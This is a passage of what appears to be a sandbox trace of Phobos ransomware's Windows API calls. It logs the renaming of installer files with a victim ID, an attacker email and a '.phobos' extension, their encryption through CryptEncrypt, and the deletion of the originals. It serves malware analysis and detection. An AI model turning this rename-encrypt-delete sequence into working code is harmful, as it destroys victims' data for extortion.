"c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0180.320] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0180.320] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0180.320] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0180.320] ReadFile (in: hFile=0xb4, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0180.674] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x1a788a, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0180.674] ReadFile (in: hFile=0xb4, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0180.697] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x4b699e, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0180.697] ReadFile (in: hFile=0xb4, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0180.899] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32ae8) returned 1 [0180.899] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0180.899] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0180.905] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.905] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0180.905] WriteFile (in: hFile=0xb4, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0180.926] SetEndOfFile (hFile=0xb4) returned 1 [0180.926] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x4b699e, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0180.926] WriteFile (in: hFile=0xb4, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0180.928] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x1a788a, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0180.928] WriteFile (in: hFile=0xb4, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0180.930] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0180.930] WriteFile (in: hFile=0xb4, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0180.932] CloseHandle (hObject=0xb4) returned 1 [0180.932] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0180.932] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0180.933] GetFileSizeEx (in: hFile=0xb4, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=147456) returned 1 [0180.933] CloseHandle (hObject=0xb4) returned 1 [0180.933] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 0x20 [0180.933] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.933] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0180.933] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0180.933] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0180.933] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0180.934] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ae8) returned 1 [0180.934] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0180.934] ReadFile (in: hFile=0xb4, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x24000, lpOverlapped=0x0) returned 1 [0180.994] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x24010, dwBufLen=0x24010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x24010) returned 1 [0180.995] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x24010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x24010, lpOverlapped=0x0) returned 1 [0180.998] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0180.998] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0180.998] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0180.998] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0180.998] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0180.999] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.999] CloseHandle (hObject=0xb4) returned 1 [0180.999] CloseHandle (hObject=0x17c) returned 1 [0180.999] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 1 [0181.002] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0181.002] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0181.004] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5588256) returned 1 [0181.004] CloseHandle (hObject=0x17c) returned 1 [0181.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0x20 [0181.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0181.126] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0181.126] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0181.126] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0181.126] ReadFile (in: hFile=0x17c, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0181.277] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x1c6c60, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0181.277] ReadFile (in: hFile=0x17c, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0181.462] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x514520, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0181.462] ReadFile (in: hFile=0x17c, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0181.727] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32c68) returned 1 [0181.727] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0181.728] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0181.734] CryptDestroyKey (hKey=0xa32c68) returned 1 [0181.734] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0181.734] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0181.750] SetEndOfFile (hFile=0x17c) returned 1 [0181.750] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x514520, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0181.750] WriteFile (in: hFile=0x17c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0181.752] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x1c6c60, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0181.752] WriteFile (in: hFile=0x17c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0181.755] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0181.755] WriteFile (in: hFile=0x17c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0181.756] CloseHandle (hObject=0x17c) returned 1 [0181.757] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0181.757] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0181.757] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=143360) returned 1 [0181.757] CloseHandle (hObject=0x17c) returned 1 [0181.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 0x20 [0181.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.757] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0181.758] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0181.758] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0181.758] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0181.758] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0181.758] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0181.758] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x23000, lpOverlapped=0x0) returned 1 [0181.831] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x23010, dwBufLen=0x23010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x23010) returned 1 [0181.832] WriteFile (in: hFile=0xb4, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x23010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x23010, lpOverlapped=0x0) returned 1 [0181.834] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0181.834] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0181.834] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0181.834] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0181.834] WriteFile (in: hFile=0xb4, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0181.834] CryptDestroyKey (hKey=0xa32c68) returned 1 [0181.834] CloseHandle (hObject=0x17c) returned 1 [0181.834] CloseHandle (hObject=0xb4) returned 1 [0181.834] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 1 [0181.836] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0181.836] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0181.841] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=151552) returned 1 [0181.841] CloseHandle (hObject=0x17c) returned 1 [0181.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 0x20 [0181.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.841] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0181.841] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0181.842] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0181.842] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 